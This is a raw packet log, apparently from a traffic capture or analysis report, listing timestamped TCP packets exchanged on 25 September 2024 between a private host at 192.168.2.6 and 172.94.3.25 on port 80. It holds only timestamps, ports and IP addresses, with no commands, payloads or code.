Sep 25, 2024 16:03:23.074731112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074750900 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074764013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074812889 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.074857950 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074870110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074882030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074892044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.074893951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074906111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074918985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074929953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074930906 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.074940920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074953079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074964046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074970961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.074975967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.074985981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.074987888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075001955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075014114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075016975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075033903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075335979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075346947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075361013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075371981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075372934 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075391054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075392962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075414896 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075426102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075436115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075438023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075450897 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075465918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075467110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075493097 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075745106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075781107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075793982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075804949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075836897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.075980902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.075992107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076004028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076016903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076030016 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076049089 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076057911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076070070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076081991 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076116085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076158047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076169014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076179981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076193094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076194048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076210976 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076221943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076222897 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076235056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076251984 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076277018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076740980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076836109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076847076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076858044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076869011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076872110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076881886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076894045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076903105 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076930046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.076958895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076970100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076981068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076992989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.076992989 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077004910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077016115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077023029 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077028036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077039957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077050924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077054977 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077063084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077075958 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077095032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077728033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077770948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077832937 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077843904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077855110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077867031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077877998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077877998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077889919 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077907085 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077938080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.077960968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077972889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077984095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.077995062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078005075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078016996 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078021049 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078028917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078041077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078049898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078052998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078063965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078089952 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078125954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078696012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078706980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078727007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078743935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078758955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078769922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078780890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078795910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078804970 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078821898 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078870058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078885078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078896999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078908920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078911066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078919888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078931093 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078932047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078943968 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078957081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078969002 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.078969002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078982115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.078988075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.079010963 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.079714060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079741001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079752922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079754114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.079763889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079776049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079787970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079797983 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.079801083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079813957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079828024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079828978 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.079839945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.079844952 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.079862118 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.082489014 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.122200012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.122226000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.122239113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.122281075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.122303963 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.162955046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.162982941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.162997961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163012981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163065910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163074017 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163084984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163096905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163108110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163114071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163121939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163144112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163156033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163166046 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163181067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163191080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163191080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163212061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163223982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163234949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163247108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163259029 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163283110 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163291931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163304090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163326025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163342953 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163347006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163382053 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163399935 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163469076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163480997 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163491964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163505077 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163522959 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163569927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163580894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163593054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163629055 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163657904 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163669109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163680077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163691044 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163691998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163703918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163716078 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163758039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163837910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163849115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163861990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163875103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163892984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163897991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163904905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.163925886 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163940907 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.163997889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164009094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164020061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164047003 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164069891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164082050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164093018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164107084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164107084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164124966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164278030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164290905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164303064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164316893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164325953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164335966 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164338112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164357901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164369106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164381027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164386988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164392948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164405107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164437056 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164442062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164453983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164464951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164484024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164496899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164504051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164509058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.164539099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.164556980 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168020010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168035984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168065071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168081999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168087006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168095112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168107033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168118000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168118954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168133020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168138981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168145895 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168169975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168169975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168188095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168200016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168205976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168212891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168224096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168231010 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168236017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168256998 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168432951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168443918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168457031 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168462038 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168469906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168479919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168482065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168493986 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168509960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168517113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168549061 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168570995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168581963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168607950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168724060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168735981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168746948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168766022 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168767929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168780088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168793917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168797970 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168811083 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168822050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168822050 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168833017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168844938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168850899 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168857098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168868065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168875933 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168880939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168893099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168901920 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168905020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168917894 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.168920994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.168960094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.169209003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169336081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169353962 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169365883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169373989 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.169377089 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169389009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169399023 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.169400930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169413090 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169424057 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.169425964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.169440031 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.172753096 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.251808882 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251844883 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251866102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251878977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251890898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251889944 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.251909018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:23.251915932 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:23.251920938 CEST	80	49715	172.94.3.25	192.168.2.6
